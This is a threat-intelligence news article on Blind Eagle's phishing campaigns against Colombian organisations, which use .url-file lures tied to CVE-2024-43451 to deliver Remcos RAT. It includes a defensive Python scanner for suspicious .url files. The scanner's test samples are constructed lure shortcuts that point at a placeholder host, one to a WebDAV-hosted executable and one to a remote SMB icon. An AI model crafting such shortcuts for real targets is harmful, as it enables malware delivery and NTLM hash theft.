Blind Eagle APT Exploits Windows Vulnerability in High-Impact Attacks on Colombian Entities
A threat actor suspected to originate from South America, known as Blind Eagle (APT-C-36), has been actively targeting Colombian government institutions and private organizations in a wave of cyberattacks, according to a report published by Check Point Research on March 10.

Investigations into Blind Eagle's activities, which stretch back to November 2024, revealed the group leveraging a variant of the exploit for CVE-2024-43451, an NTLMv2 hash disclosure vulnerability in Windows that Microsoft patched on November 12, 2024. Although the group's primary targets are high-profile government institutions, its recent campaigns have spread quickly: a single campaign on December 19, 2024 compromised more than 1,600 victims.
Blind Eagle's Cyber Espionage Tactics
Operating since 2018, Blind Eagle is an advanced persistent threat (APT) group specializing in cyberespionage and cybercrime. It has consistently targeted government institutions, financial entities, and critical infrastructure across Colombia and Latin America. The group is known for its highly deceptive social engineering techniques, primarily deploying phishing emails embedded with malicious links or attachments to gain unauthorized access to target systems.
Their malware arsenal includes widely used Remote Access Trojans (RATs) such as NjRAT, AsyncRAT, and Remcos, which enable full control over infected systems.
Exploiting CVE-2024-43451
Blind Eagle's recent campaigns involve a variant of the .url-based technique used to exploit the Windows NTLMv2 hash disclosure vulnerability CVE-2024-43451, which other threat actors had already used against Ukrainian entities in 2024. The original exploit relied on malicious .url files that leaked the victim's NTLMv2 hash after minimal user interaction, such as right-clicking, deleting, or dragging and dropping the file.
Six days after Microsoft released the patch, Blind Eagle began using an altered version of the technique. This variant does not leak NTLMv2 hashes; instead, it signals to the attackers that a user has downloaded the lure, and opening the file fetches and runs malware. Because that step depends on the user opening the file rather than on the patched flaw, it works on fully patched systems as well. The malware deployment sequence follows this pattern:
- A phishing email tricks the victim into believing they made a payment.
- The email includes an attached receipt containing a malicious .url file.
- Once opened, the .url file fetches and runs a chain of malicious executables, culminating in a .NET RAT that collects system information.
- In the final stage, Remcos RAT is executed, connecting the infected device to a command-and-control (C&C) server and enrolling it in a botnet.
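The chain above starts with a Windows Internet Shortcut (.url) file whose target is remote. As an added illustration, not code from the article or from Check Point, the following Python scanner parses .url files and flags the traits such lures exhibit: a URL=, IconFile= or WorkingDirectory= entry that points at a remote SMB/WebDAV share (which makes Explorer authenticate to the attacker's host), or a URL= that resolves to a remotely hosted executable (the payload-download variant). The three sample shortcuts, the 192.0.2.10 address and the file names are constructed for this example and are not indicators from the report; the extension list and heuristics are my own choices.

```python
"""
Heuristic scanner for Windows Internet Shortcut (.url) files.

Flags shortcuts whose URL=, IconFile= or WorkingDirectory= entries point at a
remote SMB/WebDAV location, or whose URL= points at a remotely hosted
executable. The sample files, host names and file names below are constructed
for illustration and are not indicators from the Check Point report.
"""
import configparser
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# File types Windows will run when a .url target resolves to them (my list).
EXECUTABLE_EXTS = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd",
                   ".hta", ".js", ".vbs", ".msi", ".dll")

# \\host\share..., including WebDAV-style \\host@port\DavWWWRoot\...
_UNC_RE = re.compile(r"^\\\\[^\\]+\\")


@dataclass
class Finding:
    name: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def is_remote_path(value: str) -> bool:
    """True for UNC/WebDAV paths and file:// URLs that name a remote host."""
    v = value.strip()
    if _UNC_RE.match(v):
        return True
    p = urlparse(v)
    return p.scheme == "file" and bool(p.netloc)


def is_remote_executable(value: str) -> bool:
    """True when an http(s) or remote file:// target ends in an executable type."""
    p = urlparse(value.strip())
    if p.scheme not in ("http", "https", "file"):
        return False
    if p.scheme == "file" and not p.netloc:
        return False  # file:///C:/... is local, not a download
    return p.path.lower().endswith(EXECUTABLE_EXTS)


def analyze_url_file(text: str, name: str = "<inline>") -> Finding:
    """Parse one .url file (INI syntax, '=' delimiter) and apply the heuristics."""
    finding = Finding(name)
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    try:
        cp.read_string(text)
    except configparser.Error as exc:
        finding.reasons.append(f"unparseable content: {exc}")
        return finding
    if not cp.has_section("InternetShortcut"):
        finding.reasons.append("missing [InternetShortcut] section")
        return finding
    sec = cp["InternetShortcut"]
    for key in ("URL", "IconFile", "WorkingDirectory"):
        val = sec.get(key)
        if not val:
            continue
        # A remote UNC/WebDAV reference makes Explorer reach out to the remote
        # host: for IconFile when the icon is rendered, for URL when opened.
        if is_remote_path(val):
            finding.reasons.append(f"{key} references remote share: {val}")
        if key == "URL" and is_remote_executable(val):
            finding.reasons.append(f"{key} points at remote executable: {val}")
    return finding


def scan(samples: dict) -> list:
    """Return the names of all samples with at least one finding."""
    return [n for n, t in samples.items() if analyze_url_file(t, n).suspicious]


# Constructed samples (192.0.2.10 is a documentation-only address).
BENIGN = r"""[InternetShortcut]
URL=https://www.example.com/
IconFile=C:\Windows\System32\SHELL32.dll
IconIndex=13
"""

# Mimics the payload-download variant: the target is a WebDAV-hosted .exe.
LURE_WEBDAV = r"""[InternetShortcut]
URL=file://192.0.2.10@8080/Comprobante_de_pago.exe
IconIndex=0
"""

# Mimics the hash-leak style: a remote icon makes Explorer authenticate outbound.
LURE_ICON = r"""[InternetShortcut]
URL=https://www.example.com/
IconFile=\\192.0.2.10\share\icon.ico
IconIndex=0
"""

SAMPLES = {"benign.url": BENIGN, "receipt.url": LURE_WEBDAV, "icon.url": LURE_ICON}

if __name__ == "__main__":
    for sample_name, sample_text in SAMPLES.items():
        result = analyze_url_file(sample_text, sample_name)
        print(sample_name, "SUSPICIOUS" if result.suspicious else "clean")
        for reason in result.reasons:
            print("   -", reason)
```

Run it as a script to see the benign shortcut pass and both lures flagged. In a mail gateway or EDR pipeline the same function can be applied to every .url found inside an attachment or archive; the WebDAV `host@port` form is worth a dedicated alert on its own, since legitimate shortcuts almost never use it.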
Evading Detection & Security Implications
One of Blind Eagle's key strengths lies in its ability to slip past traditional security controls by hosting its payloads on legitimate file-sharing services such as Google Drive, Dropbox, and GitHub. Many of the .url files used in these attacks go undetected by most antivirus engines on VirusTotal.
Check Point describes Blind Eagle as a critical cybersecurity threat and recommends that organizations strengthen their defenses through:
- Proactive threat intelligence
- Advanced security defenses
- Continuous monitoring
The research also includes Indicators of Compromise (IoCs) to help defenders identify potential threats in their environments.
By combining social engineering, stealthy malware delivery methods, and legitimate cloud platforms, Blind Eagle continues to evolve its tactics, making it a persistent and formidable threat to organizations in Colombia and beyond.